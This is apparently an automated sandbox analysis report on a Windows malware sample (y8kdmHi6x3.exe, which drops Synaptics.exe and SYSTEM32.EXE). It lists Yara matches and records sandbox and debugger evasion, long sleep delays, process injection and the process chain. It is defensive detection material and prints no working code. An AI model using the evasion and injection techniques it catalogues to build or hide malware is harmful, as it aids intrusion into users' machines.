            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, SYSTEM32.EXE, SYSTEM32.EXE, 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00435BD49_2_00435BD4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe TID: 6452Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXE TID: 6960Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7084Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 5248Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 5344Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 4940Thread sleep time: -240000s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1740Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7092Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 2824Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6388Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4588Thread sleep time: -480000s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4292Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\SYSTEM32.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-4350
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEWindow / User API: foregroundWindowGot 710
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeAPI coverage: 8.2 %
            Source: C:\Users\user\Desktop\WINDOWS.EXEAPI coverage: 7.7 %
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00435BD49_2_00435BD4
            Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCX831F.tmpJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCX788E.tmpJump to dropped file
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,4_2_00458EA4
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,9_2_00458EA4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560111317.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.367194735.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.522432696.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.517789046.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.468815421.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.430401552.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.477896338.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.377858654.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.462811842.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.430006882.0000000000C45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWthernet (Kernel Debugger)
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445521373.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00426548 GetSystemInfo,4_2_00426548
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,4_2_004099E0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,4_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C
            Source: C:\Users\user\Desktop\SYSTEM32.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,4_2_004730FC
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCode function: 6_2_003C2701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_003C2701
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCode function: 6_2_003C2701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_003C2701
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCode function: 6_2_003C4991 SetUnhandledExceptionFilter,6_2_003C4991
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCode function: 6_2_003C3BEC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_003C3BEC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\ProgramData\Synaptics\Synaptics.exeMemory written: C:\ProgramData\Synaptics\Synaptics.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeMemory written: C:\ProgramData\Synaptics\Synaptics.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exeJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe" Jump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE" Jump to behavior
